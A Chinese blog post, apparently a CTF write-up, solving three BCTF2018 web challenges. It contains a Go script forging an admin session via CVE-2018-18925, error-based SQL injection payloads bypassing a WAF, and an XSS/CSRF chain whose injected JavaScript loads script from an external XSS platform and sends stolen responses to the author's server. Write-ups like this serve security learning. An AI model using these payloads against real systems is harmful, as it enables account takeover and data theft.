<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="google-site-verification" content="<!---->">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,">







  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "39f38dce"
    });
  daovoice('update');
  </script>





<meta name="description" content="前言总结一下BCTF2018的解题过程，这篇博客只有其中三道题，包括但不仅限于gogs框架的任意用户登录漏洞、SQL报错注入、XSS。 虽然自己做的时候都没做出来，但在看wp的过程中回顾自己的思路时，从中发现了自己的思路偏在哪里了，有哪些从前没想过的切入点。">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="BCTF2018-web(1)">
<meta property="og:url" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/index.html">
<meta property="og:site_name" content="像风">
<meta property="og:description" content="前言总结一下BCTF2018的解题过程，这篇博客只有其中三道题，包括但不仅限于gogs框架的任意用户登录漏洞、SQL报错注入、XSS。 虽然自己做的时候都没做出来，但在看wp的过程中回顾自己的思路时，从中发现了自己的思路偏在哪里了，有哪些从前没想过的切入点。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/1.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/2.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/3.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/4.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/5.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/6.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/7.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/8.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/9.png">
<meta property="og:image" content="c:/Users/dell/AppData/Local/Temp/1543840568134.png">
<meta property="og:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/10.png">
<meta property="og:updated_time" content="2018-12-03T14:35:13.032Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BCTF2018-web(1)">
<meta name="twitter:description" content="前言总结一下BCTF2018的解题过程，这篇博客只有其中三道题，包括但不仅限于gogs框架的任意用户登录漏洞、SQL报错注入、XSS。 虽然自己做的时候都没做出来，但在看wp的过程中回顾自己的思路时，从中发现了自己的思路偏在哪里了，有哪些从前没想过的切入点。">
<meta name="twitter:image" content="http://yoursite.com/2018/12/03/BCTF2018-web-1/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/12/03/BCTF2018-web-1/">





  <title>BCTF2018-web(1) | 像风</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
<a href="https://github.com/xiangfengw" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">像风</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/12/03/BCTF2018-web-1/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xiangfeng">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="像风">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">BCTF2018-web(1)</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-12-03T16:25:11+08:00">
                2018-12-03
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2018/12/03/BCTF2018-web-1/" class="leancloud_visitors" data-flag-title="BCTF2018-web(1)">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>总结一下BCTF2018的解题过程，这篇博客只有其中三道题，包括但不仅限于gogs框架的任意用户登录漏洞、SQL报错注入、XSS。</p>
<p>虽然自己做的时候都没做出来，但在看wp的过程中回顾自己的思路时，从中发现了自己的思路偏在哪里了，有哪些从前没想过的切入点。</p>
<a id="more"></a>
<h1 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h1><p>输入一个不存在的url，看到404报错，提示：</p>
<p><code>Powered by beego 1.7.2</code></p>
<p>思路是老大提供的</p>
<p>关于gitea/gogs的CVE-2018-18925/6任意用户登录/代码执行漏洞</p>
<p>go-macaron(<a href="https://github.com/go-macaron/session" target="_blank" rel="noopener">https://github.com/go-macaron/session</a> version&lt;0.4.0)</p>
<p>beego(<a href="https://github.com/astaxie/beego" target="_blank" rel="noopener">https://github.com/astaxie/beego</a> version&lt;1.11.0)</p>
<p>都存在这个问题，p神的vulhub中也有这个洞的docker：<a href="https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925" target="_blank" rel="noopener">CVE-2018-18925</a> </p>
<p>以文件存储session，且sessionid没有过滤<code>./</code>的时候导致可以用任意文件作为session</p>
<p>所以这道题可以在头像上传处上传伪造的session文件，再用sessionid包含即可伪造身份为admin </p>
<p>这里不能使用之前的poc构造session文件了，要改一下，我当时做题时就不知道怎么改，现在学到了一些思路。</p>
<p>先上传一个0B的图片，把session设置成该地址，登陆后下载头像，解析其中的字段类型，发现两项</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">UID int</span><br><span class="line">username string</span><br></pre></td></tr></table></figure>
<p>可以直接改CVE-2018-18925的poc为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">package main</span><br><span class="line"></span><br><span class="line">import (</span><br><span class="line">    &quot;bytes&quot;</span><br><span class="line">    &quot;encoding/gob&quot;</span><br><span class="line">    &quot;encoding/hex&quot;</span><br><span class="line">    &quot;fmt&quot;</span><br><span class="line">    &quot;io/ioutil&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">func EncodeGob(obj map[interface&#123;&#125;]interface&#123;&#125;) ([]byte, error) &#123;</span><br><span class="line">    for _, v := range obj &#123;</span><br><span class="line">        gob.Register(v)</span><br><span class="line">    &#125;</span><br><span class="line">    buf := bytes.NewBuffer(nil)</span><br><span class="line">    err := gob.NewEncoder(buf).Encode(obj)</span><br><span class="line">    return buf.Bytes(), err</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func main() &#123;</span><br><span class="line">    var uid int64 = 1</span><br><span class="line">    obj := map[interface&#123;&#125;]interface&#123;&#125;&#123;&quot;username&quot;: &quot;admin&quot;, &quot;UID&quot;: uid&#125;</span><br><span class="line">    data, err := EncodeGob(obj)</span><br><span class="line">    if err != nil &#123;</span><br><span class="line">        fmt.Println(err)</span><br><span class="line">    &#125;</span><br><span class="line">    err = ioutil.WriteFile(&quot;test2.png&quot;, data, 0777)</span><br><span class="line">    if err != nil &#123;</span><br><span class="line">        fmt.Println(err)</span><br><span class="line">    &#125;</span><br><span class="line">    edata := hex.EncodeToString(data)</span><br><span class="line">    fmt.Println(edata)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>跑完poc得到一段十进制数据</p>
<img src="/2018/12/03/BCTF2018-web-1/1.png">
<p>放到<a href="https://gchq.github.io/CyberChef/" target="_blank" rel="noopener">CyberChef</a>的<code>From HEX</code>功能中，存个poc.jpg</p>
<img src="/2018/12/03/BCTF2018-web-1/2.png">
<p>上传poc.jpg后修改sessionid为上传的返回地址<code>../../../../../../go/src/github.com/checkin/website/static/img/avatar/xxxxxxx.png</code>，登陆到admin用户，访问Admin Panel得到flag</p>
<img src="/2018/12/03/BCTF2018-web-1/3.png">
<h1 id="babySQLiSPA"><a href="#babySQLiSPA" class="headerlink" title="babySQLiSPA"></a>babySQLiSPA</h1><p>这道题我第一眼看了以为是二次注入，然后在二次注入的路上越走越远，直到这道题官方的hint给了waf。</p>
<p>注册用户名的时候发现限定了<code>[a-zA-Z0-9]</code>，把其它的都过滤了， 所以没法二次注入了。</p>
<p>r3kapig的writeup中提到，在看网页源码时发现是用webpack打包的，用webpack打包过后会生成.map文件，于是访问main.dfa730c5.js.map，在其中可以发现两个没有用到的api：</p>
<img src="/2018/12/03/BCTF2018-web-1/4.png">
<img src="/2018/12/03/BCTF2018-web-1/5.png">
<p>searchHints中用到的captcha就是从getCaptcha中得到的，于是：</p>
<img src="/2018/12/03/BCTF2018-web-1/6.png">
<p>/api/hints可以注入，且报错回显。</p>
<p>看一下给的WAF</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">export function checkHint (hint) &#123;</span><br><span class="line">  return ! / |;|\+|-|\*|\/|&lt;|&gt;|~|!|\d|%|\x09|\x0a|\x0b|\x0c|\x0d|`|gtid_subset|hash|json|st\_|updatexml|extractvalue|floor|rand|exp|json_keys|uuid_to_bin|bin_to_uuid|union|like|sleep|benchmark/ig.test(hint)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>使用报错函数<code>gtid_subtract()</code>绕过</p>
<p><code>hints:&#39;or(gtid_subtract((select(group_concat(table_name))from(information_schema.tables)where((table_schema=database()))),&#39;&#39;))or&#39;</code></p>
<img src="/2018/12/03/BCTF2018-web-1/7.png">
<p>但发现返回的表名都是乱码，因为GTID_SUBTRACT()的报错信息有长度限制，最多140字节，Nu1L是限制表名长度来提取的，长度为30的时候拿到flag表”vhEFfFlLlLaAAaaggIiIIsSSHeReEE “</p>
<p>payload：<code>hint=&#39;or(gtid_subtract((select(group_concat(table_name))from(information_schema.tables)where((length(table_name)=ord(&#39;j&#39;)^ord(&#39;t&#39;)))),&#39;&#39;))or&#39;</code></p>
<p>这里也可以引入reverse()函数倒序查看表名</p>
<img src="/2018/12/03/BCTF2018-web-1/8.png">
<p>然后再爆列名：<code>hint=&#39;||gtid_subtract((select(concat(column_name))from(information_schema.columns)where(table_name=&#39;vhEFfFlLlLaAAaaggIiIIsSSHeReEE&#39;)),&#39;&#39;)#</code></p>
<p>报错信息：<code>{&quot;error&quot;:&quot;Malformed GTID set specification &#39;ZSLRSrpOlCCysnaHUqCEIjhtWbxbMlDkUO&#39;.&quot;}</code></p>
<p>最后的payload：<code>hints:&#39;||gtid_subtract((select(ZSLRSrpOlCCysnaHUqCEIjhtWbxbMlDkUO)from(vhEFfFlLlLaAAaaggIiIIsSSHeReEE)),&#39;&#39;)#</code>.</p>
<img src="/2018/12/03/BCTF2018-web-1/9.png">
<p>这道题主要没想到sql注入的位置，学习了一种报错注入用的函数。</p>
<h1 id="SEAFARING1"><a href="#SEAFARING1" class="headerlink" title="SEAFARING1"></a>SEAFARING1</h1><p>做这道题时发现login处有个XSS，之前没做过XSS的题，登陆的时候需要验证码，也没发现有什么用。</p>
<p>还有一个robots.txt提示文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /admin/handle_message.php</span><br></pre></td></tr></table></figure>
<p><code>view-source:http://seafaring.xctf.org.cn:9999/admin</code>可以看到后台的部分源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">function view_uid(uid) &#123;</span><br><span class="line">        $.ajax(&#123;</span><br><span class="line">            type: &quot;POST&quot;,</span><br><span class="line">            url: &quot;/admin/handle_message.php&quot;,</span><br><span class="line">            data: &#123;&quot;token&quot;: csrf_token, &quot;action&quot;: &quot;view_uid&quot;, &quot;uid&quot;: uid&#125;,</span><br><span class="line">            dataType: &quot;json&quot;,</span><br><span class="line">            success: function (data) &#123;</span><br><span class="line">                if (!data[&quot;error&quot;]) &#123;</span><br><span class="line">                    data = data[&apos;result&apos;];</span><br><span class="line">                    var Status = &apos;&apos;;</span><br><span class="line">                    $(&apos;#timestamp&apos;).text(data[&apos;timestamp&apos;]);</span><br><span class="line">                    $(&apos;#username&apos;).text(data[&apos;user_name&apos;]);</span><br><span class="line">                    $(&apos;#message&apos;).text(data[&apos;message&apos;]);</span><br><span class="line">                    document.getElementById(&quot;replyuid&quot;).value=data[&apos;uid&apos;];</span><br><span class="line">                    if (parseInt(data[&apos;is_checked&apos;]) == 1) &#123;</span><br><span class="line">                        Status = &apos;&lt;div style=&quot;color:#04FF00&quot;&gt;Checked&lt;/div&gt;&apos;;</span><br><span class="line">                    &#125; else &#123;</span><br><span class="line">                        Status = &apos;&lt;div style=&quot;color:#FFA500&quot;&gt;Not Checked&lt;/div&gt;&apos;;</span><br><span class="line">                    &#125;</span><br><span class="line">                    document.getElementById(&quot;status&quot;).innerHTML = Status;</span><br><span class="line">                &#125;</span><br><span class="line">                else</span><br><span class="line">                    alert(&apos;Error: &apos; + data[&quot;error&quot;]);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>进到<code>/admin/handle_message.php</code>中，提示：</p>
<p><code>{&quot;result&quot;:&quot;&quot;,&quot;error&quot;:&quot;CSRFToken &#39;&#39;is not correct&quot;}</code></p>
<p>注意到error双引号内部有个’’，猜测传入的csrftoken可能直接输出到了页面中 </p>
<p>结合源码，发现csrftoken通过token参数使用post方法传入</p>
<p><img src="C:\Users\dell\AppData\Local\Temp\1543840568134.png" alt="1543840568134"></p>
<p>传入后会回显token值，存在反射型XSS，构造类似<code>&lt;img src=1 onerror=alert(/xss/)&gt;</code>的payload时会发现对’/‘转义了。</p>
<p>接下来构造一个页面让管理员访问，这道题的评论链接会被bot机器人主动访问，因此构造csrf的html页面让bot访问。</p>
<p>之前发现了’/‘被转义了，所以这里我们使用svg或img进行xss，同时为了避免引号的问题，使用fromCharCode()方法或者使用base64编码再用atob()函数解码的方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">String.fromCharCode(numX,numX,...,numX)</span><br><span class="line">fromCharCode() 可接受一个指定的 Unicode 值，然后返回一个字符串。</span><br><span class="line"></span><br><span class="line">参数</span><br><span class="line">numX	一个或多个 Unicode 值，即要创建的字符串中的字符的 Unicode 编码。</span><br></pre></td></tr></table></figure>
<p>html页面为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;script&gt;</span><br><span class="line">    window.onload =function()&#123;</span><br><span class="line">      document.getElementById(&quot;f&quot;).submit();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  &lt;/script&gt;</span><br><span class="line">  &lt;form method=&quot;post&quot; action=&quot;http://seafaring.xctf.org.cn:9999/admin/handle_message.php&quot; id=&quot;f&quot;&gt;</span><br><span class="line"></span><br><span class="line">    &lt;input name=&quot;token&quot; value=&quot;&lt;body&gt;&lt;img src=x onerror=eval(atob(&apos;cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0dDNkRURz8nK01hdGgucmFuZG9tKCk=&apos;))&gt;&lt;/body&gt;&quot;&gt;</span><br><span class="line">  &lt;/form&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>这里的value内容也可以替换为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body&gt;&lt;img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,46,99,110,47,69,121,76,83,53,99,103,39))&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>
<p>注释：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;atob(&apos;cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0dDNkRURz8nK01hdGgucmFuZG9tKCk=&apos;)</span><br><span class="line"></span><br><span class="line">&quot;s=createElement(&apos;script&apos;);body.appendChild(s);s.src=&apos;http://xsspt.com/GC6DTG?&apos;+Math.random()&quot;</span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt;String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,46,99,110,47,69,121,76,83,53,99,103,39)</span><br><span class="line"></span><br><span class="line">&quot;document.body.appendChild(document.createElement(&apos;script&apos;)).src=&apos;ht.cn/EyLS5cg&apos;&quot;</span><br></pre></td></tr></table></figure>
<p>这里的链接地址是在xss平台上面建立的项目，引入js文件</p>
<img src="/2018/12/03/BCTF2018-web-1/10.png">
<p>当然也可以把js文件放在自己的vps上面</p>
<p>外部引入的js文件（Nu1l的师傅写的 ）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">function req(url,data)&#123;</span><br><span class="line">    var xhr = new XMLHttpRequest();</span><br><span class="line">    xhr.open(&quot;POST&quot;,url,false);</span><br><span class="line">    xhr.setRequestHeader(&quot;Content-Type&quot;,&quot;application/x-www-form-urlencoded&quot;);</span><br><span class="line">    xhr.send(data);</span><br><span class="line">    var resp = xhr.responseText;</span><br><span class="line">    return resp;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getcsrf()&#123;</span><br><span class="line">    var xhr = new XMLHttpRequest();</span><br><span class="line">    xhr.open(&quot;GET&quot;,&quot;http://seafaring.xctf.org.cn:9999/admin/index.php&quot;,false);</span><br><span class="line">    xhr.send();</span><br><span class="line">    var res = xhr.responseText;</span><br><span class="line">    var csrftoken = res.match(/csrf_token = \&quot;([a-z0-9]*)\&quot;/ig)[0].split(&apos;= &quot;&apos;)[1].replace(&apos;&quot;&apos;,&apos;&apos;);</span><br><span class="line">    return csrftoken;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function send(data)&#123;</span><br><span class="line">    location.href = &quot;http://47.95.10.238/bctf.php?data=&quot;+escape(data);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">var ress = req(&quot;http://172.20.0.2:6379/&quot;,&quot;token=&quot;+getcsrf()+&quot;&amp;action=view_unreads&amp;status=3%20%20and%201%3D2%20union%20select%201%2Cload_file%280x2f70726f632f6e65742f617270%29%2C3%2C4%20from%20f111111ag%23&quot;);</span><br><span class="line"></span><br><span class="line">send(ress);</span><br></pre></td></tr></table></figure>
<p>send()函数中的href是自己的vps</p>
<p>发现返回了<code>sqlquery debug</code>信息 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;result&quot;:&quot;&quot;,&quot;error&quot;:&quot;sql query error! debug info:SELECT timestamp,user_name,uid,is_checked,message FROM feedbacks where uid=&apos;1&apos; ORDER BY id DESC &quot;&#125;</span><br></pre></td></tr></table></figure>
<p>有一个接口存在数字型注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;result&quot;:&quot;&quot;,&quot;error&quot;:&quot;sql query error! debug info:SELECT timestamp,user_name,uid,is_checked FROM feedbacks  where is_checked=1\\&apos; ORDER BY id DESC limit 0,50&quot;&#125;</span><br></pre></td></tr></table></figure>
<p>爆表爆字段最后拿flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;result&quot;:[[&quot;1&quot;,&quot;admin,f111111ag,feedbacks&quot;,&quot;3&quot;,&quot;4&quot;]],&quot;error&quot;:&quot;&quot;&#125;</span><br><span class="line">&#123;&quot;result&quot;:[[&quot;1&quot;,&quot;flllllag&quot;,&quot;3&quot;,&quot;4&quot;]],&quot;error&quot;:&quot;&quot;&#125;</span><br><span class="line">&#123;&quot;result&quot;:[[&quot;1&quot;,&quot;bctf&#123;XsS_SQL1_7438x_2xfccmk&#125;&quot;,&quot;3&quot;,&quot;4&quot;]],&quot;error&quot;:&quot;&quot;&#125;</span><br></pre></td></tr></table></figure>
